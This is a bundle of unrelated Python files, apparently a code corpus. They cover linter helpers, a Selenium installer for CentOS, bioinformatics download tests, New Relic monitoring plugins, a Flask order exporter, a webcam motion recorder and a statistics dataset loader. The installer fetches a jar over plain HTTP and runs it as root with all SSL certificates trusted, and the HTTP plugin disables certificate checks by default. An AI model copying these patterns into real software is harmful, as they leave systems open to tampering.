    return descriptor_dir
# List all defined linters
def list_all_linters(linters_init_params=None):
    """Instantiate every linter declared across all descriptor files."""
    all_linters = []
    for one_descriptor_file in list_descriptor_files():
        all_linters.extend(
            build_descriptor_linters(one_descriptor_file, linters_init_params)
        )
    return all_linters
# List all descriptor files (one by language)
def list_descriptor_files():
    """Return the sorted list of descriptor .yml files, one per language."""
    pattern = get_descriptor_dir() + "/*.yml"
    return sorted(glob.glob(pattern))
# Extract descriptor info from descriptor file
def build_descriptor_info(file):
    """Parse a descriptor .yml file and return its raw dictionary."""
    with open(file, "r", encoding="utf-8") as descriptor_stream:
        return yaml.load(descriptor_stream, Loader=yaml.FullLoader)
# Build linter instances from a descriptor file name, and initialize them
def build_descriptor_linters(file, linter_init_params=None, linter_names=None):
    """Create Linter instances for one language descriptor file.

    :param file: path to a language descriptor .yml
    :param linter_init_params: params forwarded to each linter constructor
    :param linter_names: when non-empty, restrict to these linter names
    :return: list of instantiated linters
    """
    linter_names = linter_names or []
    # Dynamic generation from yaml
    with open(file, "r", encoding="utf-8") as f:
        language_descriptor = yaml.load(f, Loader=yaml.FullLoader)
    # Attributes shared by every linter of this language: "linters" is
    # excluded and the raw "install" key is exposed as "descriptor_install".
    common_attributes = {}
    for attr_key, attr_value in language_descriptor.items():
        if attr_key == "install":
            common_attributes["descriptor_install"] = attr_value
        elif attr_key != "linters":
            common_attributes[attr_key] = attr_value
    linters = []
    for linter_descriptor in language_descriptor.get("linters"):
        if linter_names and linter_descriptor["linter_name"] not in linter_names:
            continue
        # Use custom class if defined in file
        linter_class = Linter
        custom_class_path = linter_descriptor.get("class")
        if custom_class_path:
            class_module_name = os.path.splitext(
                os.path.basename(custom_class_path)
            )[0]
            linter_module = importlib.import_module(
                ".linters." + class_module_name, package=__package__
            )
            linter_class = getattr(linter_module, class_module_name)
        # Create a Linter class instance by linter (descriptor overrides common)
        merged_attributes = {**common_attributes, **linter_descriptor}
        linters.append(linter_class(linter_init_params, merged_attributes))
    return linters
# Build a single linter instance from language and linter name
def build_linter(language, linter_name):
    """Instantiate exactly one linter for *language* named *linter_name*."""
    descriptor_path = get_descriptor_dir() + os.path.sep + language.lower() + ".yml"
    assert os.path.isfile(descriptor_path), f"Unable to find {descriptor_path}"
    matching = build_descriptor_linters(descriptor_path, None, [linter_name])
    assert len(matching) == 1, f"Unable to find linter {linter_name} in {descriptor_path}"
    return matching[0]
def check_file_extension_or_name(file, file_extensions, file_names):
    """Tell whether *file* is selected by extension list, name list, or "*"."""
    base_name = os.path.basename(file)
    stem, extension = os.path.splitext(base_name)
    if file_extensions and extension in file_extensions:
        return True
    if file_names and stem in file_names:
        return True
    # a single "*" extension entry means "match everything"
    return len(file_extensions) == 1 and file_extensions[0] == "*"
# Center the string and complete blanks with hyphens (-)
def format_hyphens(str_in):
    """Center *str_in* (space-padded when non-empty) in a 100-char hyphen rule."""
    label = f" {str_in} " if str_in != "" else str_in
    return "{s:{c}^{n}}".format(s=label, n=100, c="-")
def list_active_reporters_for_scope(scope, reporter_init_params):
    """Instantiate every active reporter whose class scope matches *scope*.

    Scans the reporters/ directory next to this module, imports each
    *Reporter.py module (class name == module name), instantiates classes
    whose ``scope`` attribute matches, drops inactive instances and
    returns the remainder sorted by name.
    """
    reporters_dir = os.path.realpath(
        os.path.dirname(os.path.abspath(__file__)) + "/reporters"
    )
    candidates = []
    for file_name in os.listdir(reporters_dir):
        if not file_name.endswith("Reporter.py"):
            continue
        class_name = os.path.splitext(file_name)[0]
        module = importlib.import_module(
            ".reporters." + class_name, package=__package__
        )
        reporter_class = getattr(module, class_name)
        if reporter_class.scope == scope:
            candidates.append(reporter_class(reporter_init_params))
    # Keep everything except reporters explicitly flagged inactive
    active_reporters = [r for r in candidates if r.is_active is not False]
    active_reporters.sort(key=lambda reporter: reporter.name)
    return active_reporters
# Can receive a list of strings, regexes, or even mixed :).
# Regexes must start with '(' to be identified are regex
# Can receive a list of strings, regexes, or even mixed :).
# Regexes must start with '(' to be identified as regex
def file_contains(file_name, regex_or_str_list):
    """Return True if the file contains any of the given strings/regexes.

    Entries starting with "(" are treated as regular expressions (matched
    in MULTILINE mode); other entries are plain substring checks. Returns
    False for files that are not valid UTF-8.

    :param str file_name: path of the file to inspect
    :param list regex_or_str_list: mixed list of plain strings and regexes
    :rtype: bool
    """
    with open(file_name, "r", encoding="utf-8") as f:
        try:
            content = f.read()
        except UnicodeDecodeError:
            return False
    for regex_or_str in regex_or_str_list:
        # startswith() instead of [0] so an empty entry cannot raise IndexError
        if regex_or_str.startswith("("):
            # Bug fix: re.MULTILINE was previously passed as the `pos`
            # argument of Pattern.search(), which skipped the first 8
            # characters instead of enabling multi-line mode. Flags must
            # be supplied at compile/search time instead.
            if re.search(regex_or_str, content, re.MULTILINE) is not None:
                return True
        elif regex_or_str in content:
            return True
    return False
def decode_utf8(stdout):
    """Decode process output bytes as UTF-8, falling back to str() on failure."""
    # noinspection PyBroadException
    try:
        return stdout.decode("utf-8")
    except Exception:
        return str(stdout)
def list_updated_files(repo_home):
    """Return paths of files with unstaged modifications in the git repo.

    Tries *repo_home* first, then REPO_HOME_DEFAULT; returns an empty
    list (with a warning) when neither is a git repository.
    """
    repo = None
    for candidate in (repo_home, REPO_HOME_DEFAULT):
        try:
            repo = git.Repo(candidate)
            break
        except git.InvalidGitRepositoryError:
            continue
    if repo is None:
        logging.warning("Unable to find git repository to list updated files")
        return []
    return [item.a_path for item in repo.index.diff(None)]
def check_updated_file(file, repo_home):
    """Return True if *file* matches one of the repository's updated files.

    Matching is a substring test of each changed (relative) path against
    the absolute path of *file*.
    """
    file_absolute = os.path.abspath(file)
    return any(
        changed_file in file_absolute
        for changed_file in list_updated_files(repo_home)
    )
def normalize_log_string(str_in):
    """Strip ANSI color codes and temp/workspace path prefixes from a log line."""
    result = ANSI_ESCAPE_REGEX.sub("", str_in)
    # Remove container/CI path prefixes so logs are environment-independent
    for prefix in ("/tmp/lint/", "tmp/lint/", "/github/workspace/", "github/workspace/"):
        result = result.replace(prefix, "")
    return result
|
#!/usr/bin/env python
import time
import sys
import os
# Echo and run one shell command.
# NOTE(review): the os.system() exit status is ignored, so failed
# commands do not stop the installer — confirm that is intentional.
def run_cmd(command):
    print "CMD: " + command
    print
    os.system(command)
    print
    # Brief pause between commands so the console output stays readable
    time.sleep(1)
    return
# Installer entry point: runs a fixed sequence of yum/pip/setup commands
# to prepare a CentOS 6 host for Selenium-based UI testing, then prints
# follow-up instructions for the operator.
def main():
    print
    print "===== INSTALLER FOR SE34EUCA ON CENTOS 6 ======"
    print
    # Base system packages
    cmd = "sudo yum -y update"
    run_cmd(cmd)
    cmd = "sudo yum -y install git vim"
    run_cmd(cmd)
    # Headless X server and fonts so Firefox can render without a display
    cmd = "sudo yum -y install Xvfb"
    run_cmd(cmd)
    cmd = "sudo yum -y install xorg-x11-fonts*"
    run_cmd(cmd)
    # Java runtime for the Selenium standalone server, plus the browser
    cmd = "sudo yum -y install java-1.7.0-openjdk.x86_64"
    run_cmd(cmd)
    cmd = "sudo yum -y install firefox"
    run_cmd(cmd)
    # Python tooling and the Selenium bindings
    cmd = "sudo yum -y install python-setuptools"
    run_cmd(cmd)
    cmd = "sudo easy_install pip"
    run_cmd(cmd)
    cmd = "sudo pip install selenium"
    run_cmd(cmd)
    # Download the Selenium standalone server jar into /root/selenium-server
    cmd = "sudo mkdir -p /root/selenium-server"
    run_cmd(cmd)
    cmd = "wget http://selenium.googlecode.com/files/selenium-server-standalone-2.32.0.jar"
    run_cmd(cmd)
    cmd = "sudo mv ./selenium-server-standalone-2.32.0.jar /root/selenium-server/."
    run_cmd(cmd)
    # Start the virtual display and the Selenium server in the background
    cmd = "Xvfb :0 -ac 2> /dev/null &"
    run_cmd(cmd)
    cmd = "sudo nohup java -jar /root/selenium-server/selenium-server-standalone-2.32.0.jar -trustAllSSLCertificates > /tmp/selenium-server.out 2> /tmp/selenium-server.err &"
    run_cmd(cmd)
    # Ensure a D-Bus machine id exists (Firefox needs it on minimal hosts)
    cmd = "dbus-uuidgen | sudo tee -a /var/lib/dbus/machine-id"
    run_cmd(cmd)
    print
    print "===== INSTALLER FOR SE34EUCA : DONE ====="
    print
    print "TO DO:"
    print
    print "*** BE SURE TO RUN BELOW COMMAND FIRST:"
    print
    print "export PYTHONPATH=$PYTHONPATH:/home/vagrant/se34euca"
    print
    print "export DISPLAY=:0"
    print
    print "## TEST RUN ##"
    print
    print "./runtest_ip_address.py -i 192.168.51.86 -p 8888 -a ui-test-acct-00 -u user00 -w mypassword1 -t allocate_two_ip_addresses"
    print
    print "./runtest_ip_address.py -i 192.168.51.86 -p 8888 -a ui-test-acct-00 -u user00 -w mypassword1 -t release_ip_address"
    print
# Script entry point.
# Bug fix: a stray bare `exit` expression followed main(); referencing the
# builtin without calling it was a no-op, so it has been removed.
if __name__ == "__main__":
    main()
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
from iss import download
from iss.util import cleanup
from nose.tools import with_setup
def setup_function():
    # NOTE(review): this assignment only creates an unused local variable;
    # it configures nothing for the tests and looks like a leftover —
    # confirm before removing.
    output_file_prefix = 'data/.test'
def teardown_function():
    # Remove the fasta file produced by the download tests
    cleanup(['data/test_download.fasta'])
@with_setup(setup_function, teardown_function)
def download_to_fasta():
    # Downloads a genome assembly from the NCBI FTP site and writes it to
    # data/test_download.fasta (network-dependent, nothing is asserted).
    # NOTE(review): the name lacks the `test_` prefix, so test runners will
    # not collect it automatically — possibly deliberate to skip the slow
    # download; confirm.
    ftp_url = 'ftp://ftp.ncbi.nlm.nih.gov/genomes/all/GCF/000/737/615/GCF_000737615.1_ASM73761v1/GCF_000737615.1_ASM73761v1_genomic.fna.gz'
    download.assembly_to_fasta(ftp_url, 'data/test_download.fasta')
@with_setup(setup_function, teardown_function)
def test_ncbi():
    # Fetches 2 bacterial genomes through the NCBI API into the test fasta
    # file (network-dependent; the result is not asserted beyond not raising)
    genome_list = download.ncbi('bacteria', 2, 'data/test_download.fasta')
|
#!/usr/bin/env python3
import csv
import os
import subprocess
import sys
from argparse import ArgumentParser
def main():
    """Stage the per-cohort build artifacts for the cohort named in a metadata TSV.

    Reads the tab-separated metadata file given on the command line to find
    the "Cohort ID" row, verifies that the generated per-cohort files exist,
    then `git add`s them together with the shared data files. Exits with
    status 1 and an error message when the cohort ID or any expected file
    is missing.
    """
    p = ArgumentParser()
    p.add_argument("metadata")
    args = p.parse_args()
    cohort_id = None
    with open(args.metadata, "r") as f:
        reader = csv.reader(f, delimiter="\t")
        for row in reader:
            # Guard against blank lines, which csv yields as empty rows
            if row and row[0] == "Cohort ID":
                cohort_id = row[1].strip().lower()
    if not cohort_id:
        print("ERROR: No 'Cohort ID' found in metadata")
        sys.exit(1)
    # Per-cohort files that the update task must have generated
    # (typo fix: error message previously read "does not exists")
    required_files = [
        f"templates/{cohort_id}.tsv",
        f"data_dictionaries/{cohort_id}.owl",
        f"metadata/{cohort_id}.ttl",
    ]
    for required in required_files:
        if not os.path.exists(required):
            print(f"ERROR: '{required}' does not exist - run update task and try again")
            sys.exit(1)
    # Stage the cohort files plus the shared data files
    for file in required_files + [
        "data/cohort-data.json",
        "data/metadata.json",
        "src/prefixes.json",
    ]:
        print(f"Adding {file}...")
        subprocess.call(["git", "add", file], cwd=".")
# Script entry point
if __name__ == "__main__":
    main()
|
from factory import Faker, post_generation
from factory.django import DjangoModelFactory
from cookbook.recipes.models import Ingredient, Recipe
class RecipeFactory(DjangoModelFactory):
    """Factory producing Recipe model instances for tests.

    Every generated recipe uses the fixed name "pizza".
    """
    recipe_name = "pizza"
    class Meta:
        model = Recipe
from SimpleCV import Camera, Display, Image, np, VideoStream
import time
#Program by Fares Al Ghazy, 15/8/2016
#A thanks to the FaceBook group " Raspberry pi" which was very helpful
#A special thanks to Martin Jenkins for giving alot of his time, knowledge and support
#This code is not supposed to be used commercially
#Do not use program before checking with local laws
#This program is not meant to run instantly, try to understand it then use it :)
#initialize camera
cam = Camera()
#threshold between 0 and 1
def detectmotion(threshold=0.2, noise_constant=10, wait_secs=0.5):
    """Return True when the fraction of pixels that changed between two
    camera frames reaches *threshold*.

    :param threshold: fraction (0..1) of pixels that must change
    :param noise_constant: integer divisor applied to the frame difference
        so that near-zero (noise) pixels floor to 0
    :param wait_secs: delay between the two captures; a longer gap means a
        greater difference and easier detection

    Bug fixes: time.sleep() was called without its required argument
    (TypeError at runtime), and the main loop calls detectmotion() with no
    arguments, so all parameters now have defaults (TODO: tune them).
    """
    # take 2 images
    img1 = cam.getImage()
    time.sleep(wait_secs)
    img2 = cam.getImage()
    # find difference between images
    difference = img2 - img1
    # integer division floors noisy near-zero pixels to 0 (how aggressive
    # this is depends on camera quality)
    difference = difference / noise_constant
    # count non-zero pixels: those are the ones that changed between frames
    matrix = difference.getNumpy()
    flat = matrix.flatten()
    num_pixels_changed = np.count_nonzero(flat)
    percent_change = float(num_pixels_changed) / float(len(flat))
    return percent_change >= threshold
# --- main script: record video whenever motion is detected ---
# The template placeholders below (video format, fps, recording length,
# sleep durations) were previously left empty, which made this file a
# SyntaxError. They are filled with working defaults — TODO: tune them.
VIDEO_FORMAT = ".avi"      # container extension for the output file
FPS = 15                   # frames per second of the recorded stream
VIDEO_LENGTH_MINS = 1      # how long to record after motion is seen
POLL_DELAY_SECS = 1        # pause between motion checks

# Output file is named after the current date/time
name = "" + time.strftime("%d_%m") + time.strftime("%H_%M") + VIDEO_FORMAT
# Destination path; set a directory prefix here if desired
path = "" + name
vs = VideoStream(path, fps=FPS)
while True:
    print("Program started,waiting for motion")
    if detectmotion():
        print("Motion detected, capturing video")
        start_time = time.time()
        mins = 0
        # Record frames until the configured number of minutes has elapsed
        while mins <= VIDEO_LENGTH_MINS:
            image = cam.getImage()
            image.save(vs)
            mins = (time.time() - start_time) / 60
        print("Video captured and saved")
    time.sleep(POLL_DELAY_SECS)
|
"""
Base Plugin Classes
"""
import csv
import logging
from os import path
import requests
import socket
import tempfile
import time
import urllib.parse as urlparse
LOGGER = logging.getLogger(__name__)
class Plugin(object):
    """Base class for NewRelic platform plugin agents.

    Subclasses implement poll() to retrieve data and add_datapoints() to
    convert the retrieved data into gauge and derive metric values.
    """
    GUID = 'com.meetme.newrelic_plugin_agent'
    # Largest 32-bit signed int; used as the initial "min" sentinel in
    # initialize_counters() and as the cap for sum-of-squares values
    MAX_VAL = 2147483647
    def __init__(self, config, poll_interval, last_interval_values=None):
        """
        :param dict config: the plugin configuration
        :param int poll_interval: seconds between polls
        :param dict last_interval_values: derive values carried over from
            the previous interval, if any

        """
        self.config = config
        LOGGER.debug('%s config: %r', self.__class__.__name__, self.config)
        self.poll_interval = poll_interval
        self.poll_start_time = 0
        self.derive_values = dict()
        self.derive_last_interval = last_interval_values or dict()
        self.gauge_values = dict()
    def add_datapoints(self, data):
        """Extend this method to process the data points retrieved during the
        poll process.
        :param mixed data: The data received during the poll process
        """
        raise NotImplementedError
    def add_derive_value(self, metric_name, units, value, count=None):
        """Add a value that will derive the current value from the difference
        between the last interval value and the current value.
        If this is the first time a stat is being added, it will report a 0
        value until the next poll interval and it is able to calculate the
        derivative value.
        :param str metric_name: The name of the metric
        :param str units: The unit type
        :param int value: The value to add
        :param int count: The number of items the timing is for
        """
        if value is None:
            value = 0
        metric = self.metric_name(metric_name, units)
        if metric not in self.derive_last_interval.keys():
            # First sighting of this metric: no previous value to diff against
            LOGGER.debug('Bypassing initial %s value for first run', metric)
            self.derive_values[metric] = self.metric_payload(0, count=0)
        else:
            # Report the delta since the previous interval
            cval = value - self.derive_last_interval[metric]
            self.derive_values[metric] = self.metric_payload(cval, count=count)
            LOGGER.debug('%s: Last: %r, Current: %r, Reporting: %r',
                         metric, self.derive_last_interval[metric], value,
                         self.derive_values[metric])
        self.derive_last_interval[metric] = value
    def add_derive_timing_value(self, metric_name, units, count, total_value,
                                last_value=None):
        """For timing based metrics that have a count of objects for the timing
        and an optional last value.
        :param str metric_name: The name of the metric
        :param str units: The unit type
        :param int count: The number of items the timing is for
        :param int total_value: The timing value
        :param int last_value: The last value
        """
        if last_value is None:
            return self.add_derive_value(metric_name, units,
                                         total_value, count)
        self.add_derive_value('%s/Total' % metric_name,
                              units, total_value, count)
        self.add_derive_value('%s/Last' % metric_name,
                              units, last_value, count)
    def add_gauge_value(self, metric_name, units, value,
                        min_val=None, max_val=None, count=None,
                        sum_of_squares=None):
        """Add a value that is not a rolling counter but rather an absolute
        gauge
        :param str metric_name: The name of the metric
        :param str units: The unit type
        :param int value: The value to add
        :param float value: The sum of squares for the values
        """
        metric = self.metric_name(metric_name, units)
        self.gauge_values[metric] = self.metric_payload(value,
                                                        min_val,
                                                        max_val,
                                                        count,
                                                        sum_of_squares)
        LOGGER.debug('%s: %r', metric_name, self.gauge_values[metric])
    def component_data(self):
        """Create the component section of the NewRelic Platform data payload
        message.
        :rtype: dict
        """
        # Merge derive and gauge metrics into a single mapping
        metrics = dict()
        metrics.update(self.derive_values.items())
        metrics.update(self.gauge_values.items())
        return {'name': self.name,
                'guid': self.GUID,
                'duration': self.poll_interval,
                'metrics': metrics}
    def error_message(self):
        """Output an error message when stats collection fails"""
        LOGGER.error('Error collecting stats data from %s. Please check '
                     'configuration and sure it conforms with YAML '
                     'syntax', self.__class__.__name__)
    def finish(self):
        """Note the end of the stat collection run and let the user know of any
        errors.
        """
        # No values at all means the poll produced nothing — treat as error
        if not self.derive_values and not self.gauge_values:
            self.error_message()
        else:
            LOGGER.info('%s poll successful, completed in %.2f seconds',
                        self.__class__.__name__,
                        time.time() - self.poll_start_time)
    def initialize(self):
        """Empty stats collection dictionaries for the polling interval"""
        self.poll_start_time = time.time()
        self.derive_values = dict()
        self.gauge_values = dict()
    def initialize_counters(self, keys):
        """Create a new set of counters for the given key list
        :param list keys: Keys to initialize in the counters
        :rtype: tuple
        """
        count, total, min_val, max_val, values = (dict(), dict(), dict(),
                                                  dict(), dict())
        for key in keys:
            # min starts at MAX_VAL so any real sample becomes the new minimum
            (count[key], total[key], min_val[key],
             max_val[key], values[key]) = 0, 0, self.MAX_VAL, 0, list()
        return count, total, min_val, max_val, values
    def metric_name(self, metric, units):
        """Return the metric name in the format for the NewRelic platform
        :param str metric: The name of th metric
        :param str units: The unit name
        """
        if not units:
            return 'Component/%s' % metric
        return 'Component/%s[%s]' % (metric, units)
    def metric_payload(self, value, min_value=None, max_value=None, count=None,
                       squares=None):
        """Return the metric in the standard payload format for the NewRelic
        agent.
        :rtype: dict
        """
        if not value:
            value = 0
        # Non-numeric values cannot be reported; coerce strings to zero
        if isinstance(value, str):
            value = 0
        sum_of_squares = int(squares or (value * value))
        # Cap overflowing sums at zero rather than reporting garbage
        if sum_of_squares > self.MAX_VAL:
            sum_of_squares = 0
        return {'min': min_value,
                'max': max_value,
                'total': value,
                'count': count or 1,
                'sum_of_squares': sum_of_squares}
    @property
    def name(self):
        """Return the name of the component
        :rtype: str
        """
        # Default to the short hostname when no name is configured
        return self.config.get('name', socket.gethostname().split('.')[0])
    def poll(self):
        """Poll the server returning the results in the expected component
        format.
        """
        raise NotImplementedError
    def sum_of_squares(self, values):
        """Return the sum_of_squares for the given values
        :param list values: The values list
        :rtype: float
        """
        value_sum = sum(values)
        if not value_sum:
            return 0
        squares = list()
        for value in values:
            squares.append(value * value)
        return sum(squares) - float(value_sum * value_sum) / len(values)
    def values(self):
        """Return the poll results
        :rtype: dict
        """
        return self.component_data()
class SocketStatsPlugin(Plugin):
    """Connect to a socket and collect stats data"""
    DEFAULT_HOST = 'localhost'
    DEFAULT_PORT = 0
    # Maximum bytes read per recv() call (10 MiB)
    SOCKET_RECV_MAX = 10485760
    def connect(self):
        """Top level interface to create a socket and connect it to the
        socket.
        :rtype: socket
        """
        try:
            connection = self.socket_connect()
        except socket.error as error:
            # On failure the implicit return value is None; poll() checks it
            LOGGER.error('Error connecting to %s: %s',
                         self.__class__.__name__, error)
        else:
            return connection
    def fetch_data(self, connection, read_till_empty=False):
        """Read the data from the socket
        :param socket connection: The connection
        """
        LOGGER.debug('Fetching data')
        received = connection.recv(self.SOCKET_RECV_MAX)
        # Optionally keep reading until the peer stops sending
        while read_till_empty:
            chunk = connection.recv(self.SOCKET_RECV_MAX)
            if chunk:
                received += chunk
            else:
                break
        return received
    def poll(self):
        """This method is called after every sleep interval. If the intention
        is to use an IOLoop instead of sleep interval based daemon, override
        the run method.
        """
        LOGGER.info('Polling %s', self.__class__.__name__)
        self.initialize()
        # Fetch the data from the remote socket
        connection = self.connect()
        if not connection:
            LOGGER.error('%s could not connect, skipping poll interval',
                         self.__class__.__name__)
            return
        data = self.fetch_data(connection)
        connection.close()
        if data:
            self.add_datapoints(data)
            self.finish()
        else:
            self.error_message()
    def socket_connect(self):
        """Low level interface to create a socket and connect to it.
        :rtype: socket
        """
        # A configured 'path' selects a UNIX domain socket; otherwise a
        # TCP connection to host:port is used
        if 'path' in self.config:
            if path.exists(self.config['path']):
                LOGGER.debug('Connecting to UNIX domain socket: %s',
                             self.config['path'])
                connection = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
                connection.connect(self.config['path'])
            else:
                LOGGER.error('UNIX domain socket path does not exist: %s',
                             self.config['path'])
                return None
        else:
            remote_host = (self.config.get('host', self.DEFAULT_HOST),
                           self.config.get('port', self.DEFAULT_PORT))
            LOGGER.debug('Connecting to %r', remote_host)
            connection = socket.socket()
            connection.connect(remote_host)
        return connection
class HTTPStatsPlugin(Plugin):
    """Extend the Plugin class overriding poll for targets that provide data
    via HTTP protocol.
    """
    DEFAULT_PATH = '/'
    DEFAULT_QUERY = None
    def fetch_data(self):
        """Fetch the data from the stats URL
        :rtype: str
        """
        data = self.http_get()
        return data.text if data else ''
    def http_get(self, url=None):
        """Fetch the data from the stats URL or a specified one.
        :param str url: URL to fetch instead of the stats URL
        :rtype: requests.models.Response
        """
        LOGGER.debug('Polling %s Stats at %s',
                     self.__class__.__name__, url or self.stats_url)
        req_kwargs = self.request_kwargs
        req_kwargs.update({'url': url} if url else {})
        try:
            response = requests.get(**req_kwargs)
        except requests.ConnectionError as error:
            LOGGER.error('Error polling stats: %s', error)
            # '' signals a connection failure (falsy, like the None below)
            return ''
        if response.status_code >= 300:
            LOGGER.error('Error response from %s (%s): %s', self.stats_url,
                         response.status_code, response.content)
            # None signals an HTTP error status
            return None
        return response
    def poll(self):
        """Poll HTTP server for stats data"""
        self.initialize()
        data = self.fetch_data()
        if data:
            self.add_datapoints(data)
        self.finish()
    @property
    def stats_url(self):
        """Return the configured URL in a uniform way for all HTTP based data
        sources.
        :rtype: str
        """
        netloc = self.config.get('host', 'localhost')
        if self.config.get('port'):
            netloc += ':%s' % self.config['port']
        return urlparse.urlunparse((self.config.get('scheme', 'http'),
                                    netloc,
                                    self.config.get('path', self.DEFAULT_PATH),
                                    None,
                                    self.config.get('query',
                                                    self.DEFAULT_QUERY),
                                    None))
    @property
    def request_kwargs(self):
        """Return kwargs for a HTTP request.
        :rtype: dict
        """
        kwargs = {'url': self.stats_url}
        # Certificate verification is opt-in for https targets
        if self.config.get('scheme') == 'https':
            kwargs['verify'] = self.config.get('verify_ssl_cert', False)
        if 'username' in self.config and 'password' in self.config:
            kwargs['auth'] = (self.config['username'], self.config['password'])
        LOGGER.debug('Request kwargs: %r', kwargs)
        return kwargs
class CSVStatsPlugin(HTTPStatsPlugin):
    """Extend the Plugin overriding poll for targets that provide CSV output
    for stats collection
    """
    def fetch_data(self):
        """Fetch the stats URL and parse its CSV body into a list of rows.

        :rtype: list (of dicts), or an empty dict when nothing was fetched
        """
        data = super(CSVStatsPlugin, self).fetch_data()
        if not data:
            return dict()
        # Bug fix: TemporaryFile() defaults to binary mode ('w+b'), but
        # fetch_data() returns str, so temp.write(data) raised TypeError
        # under Python 3. Open the scratch file in text mode (newline=''
        # per the csv module's requirements).
        with tempfile.TemporaryFile(mode='w+', newline='') as temp:
            temp.write(data)
            temp.seek(0)
            return list(csv.DictReader(temp))
    def poll(self):
        """Poll HTTP CSV endpoint for stats data"""
        self.initialize()
        data = self.fetch_data()
        if data:
            self.add_datapoints(data)
        self.finish()
class JSONStatsPlugin(HTTPStatsPlugin):
    """HTTP stats plugin variant for endpoints that return JSON documents."""
    def fetch_data(self):
        """Fetch and decode the JSON stats document.

        :rtype: dict (empty when the request failed or decoding errored)
        """
        response = self.http_get()
        if not response:
            return {}
        try:
            return response.json()
        except Exception as err:
            LOGGER.error('JSON decoding error: %r', err)
        return {}
    def poll(self):
        """Poll HTTP JSON endpoint for stats data"""
        self.initialize()
        data = self.fetch_data()
        if data:
            self.add_datapoints(data)
        self.finish()
|
import csv
from flask import render_template, request, send_file
from flask_classy import FlaskView, route
from flask_login import login_required
from OrderSystem import db, sentry
from OrderSystem.routing.ErrorHandler import get_current_user
from OrderSystem.sql.ORM import Order
from OrderSystem.utilities.ServerLogger import log_event
class SystemService(FlaskView):
    """
    This route will handle doing miscellaneous tasks that involve interacting with the backend.
    I.e. :
    - Generating a data dump
    """
    # Routes will be prefixed by sys-service
    route_base = ""
    @route('/', methods=['GET'])
    @login_required
    def index(self):
        # Landing page listing the available system-service tools
        return render_template('sys-service/index.html')
    @route('/data-exporter', methods=['GET', 'POST'])
    @login_required
    def data_exporter(self):
        # GET renders the export form; POST builds a CSV of every order in
        # the requested fiscal year and returns it as a file download.
        if request.method == 'POST':
            fiscal_year = request.form.get('fiscal_year')
            csv_path = '/tmp/{0}-fiscal-year-orders.csv'.format(fiscal_year)
            # NOTE(review): 'wb' + csv.writer is a Python 2 pattern; under
            # Python 3 csv needs a text-mode file (open(..., 'w', newline=''))
            # — confirm the target interpreter before changing this.
            with open(csv_path, 'wb') as csv_file:
                writer = csv.writer(csv_file, delimiter=',', quoting=csv.QUOTE_ALL)
                # Header row for the export
                writer.writerow(
                    "part_name,part_quantity,part_url,part_unit_price,part_total_price,vendor_name,ordering_subteam,"
                    "part_ordered_on".split(',')
                )
                # Orders for the requested fiscal year, oldest first
                all_orders_in_fiscal_year = db.session.query(Order).filter(Order.fiscal_year == fiscal_year).order_by(
                    Order.part_ordered_on.asc())
                for order in all_orders_in_fiscal_year:
                    part_name = order.part_name
                    part_quantity = order.part_quantity
                    part_url = order.part_url
                    part_unit_price = order.part_unit_price
                    part_total_price = order.part_total_price
                    vendor_name = order.vendor.vendor_name
                    ordering_subteam_name = order.subteam.name
                    part_ordered_on = order.part_ordered_on
                    writer.writerow([part_name, part_quantity, part_url, part_unit_price, part_total_price, vendor_name,
                                     ordering_subteam_name, part_ordered_on])
            try:
                return send_file(csv_path, as_attachment=True)
            except Exception as e:
                # Log and report the failure; the view falls through with no
                # explicit response in this case
                log_event('ERROR', '{0} encountered {1} at {2}'.format(get_current_user(), e, request.path))
                sentry.captureException()
        else:
            return render_template('sys-service/data-exporter.html', page="data_exporter")
|
import string
def rotate(orig, offset):
    """Caesar-shift each ASCII letter in *orig* by *offset* positions.

    Case is preserved; non-letter characters pass through unchanged.
    Negative offsets rotate backwards.
    """
    shifted = []
    for ch in orig:
        if 'a' <= ch <= 'z':
            base = ord('a')
            shifted.append(chr(base + (ord(ch) - base + offset) % 26))
        elif 'A' <= ch <= 'Z':
            base = ord('A')
            shifted.append(chr(base + (ord(ch) - base + offset) % 26))
        else:
            shifted.append(ch)
    return "".join(shifted)
|
"""Stack loss data"""
__all__ = ['COPYRIGHT','TITLE','SOURCE','DESCRSHORT','DESCRLONG','NOTE', 'load']
__docformat__ = 'restructuredtext'
COPYRIGHT = """This is public domain. """
TITLE = __doc__
SOURCE = """
Brownlee, K. A. (1965), "Statistical Theory and Methodology in
Science and Engineering", 2nd edition, New York:Wiley.
"""
DESCRSHORT = """Stack loss plant data of Brownlee (1965)"""
DESCRLONG = """The stack loss plant data of Brownlee (1965) contains
21 days of measurements from a plant's oxidation of ammonia to nitric acid.
The nitric oxide pollutants are captured in an absorption tower."""
NOTE = """
Number of Observations - 21
Number of Variables - 4
Variable name definitions::
STACKLOSS - 10 times the percentage of ammonia going into the plant that
escapes from the absoroption column
AIRFLOW - Rate of operation of the plant
WATERTEMP - Cooling water temperature in the absorption tower
ACIDCONC - Acid concentration of circulating acid minus 50 times 10.
"""
from numpy import recfromtxt, column_stack, array
from scikits.statsmodels.datasets import Dataset
from os.path import dirname, abspath
def load():
    """
    Load the stack loss data and return a Dataset class instance.

    Returns
    -------
    Dataset instance:
        See DATASET_PROPOSAL.txt for more information.
    """
    filepath = dirname(abspath(__file__))
    # Use a context manager so the CSV file handle is always closed
    # (previously the open() handle was leaked)
    with open(filepath + '/stackloss.csv', "rb") as csv_file:
        data = recfromtxt(csv_file, delimiter=",", names=True, dtype=float)
    names = list(data.dtype.names)
    # First column is the endogenous variable; the rest are exogenous
    endog = array(data[names[0]], dtype=float)
    endog_name = names[0]
    # column_stack needs a sequence: the previous generator argument breaks
    # on newer numpy versions
    exog = column_stack([data[i] for i in names[1:]]).astype(float)
    exog_name = names[1:]
    return Dataset(data=data, names=names, endog=endog, exog=exog,
                   endog_name=endog_name, exog_name=exog_name)
|
import pandas as pd
from processing.utils import infer_gender_image, infer_gender_name, download_images, consolidate_gender, clean_name
import os
import re
from bs4 import BeautifulSoup
import datetime
from pathlib import Path
import json
from constants import DATA_PATH
def visit_language(list_path: str,
                   html_path: str,
                   language: str,
                   file_regex: str = r"([0-9]+)\_([0-9]+)"):
    """Crawl every saved teacher HTML page for *language* into a DataFrame.

    :param list_path: directory containing per-date teacher list JSONs
    :param html_path: directory containing saved teacher HTML pages
    :param language: language sub-directory to process
    :param file_regex: pattern extracting (position, date) from file names
        (now a raw string so the escape is not interpreted by Python)
    :return: one row per successfully parsed teacher page
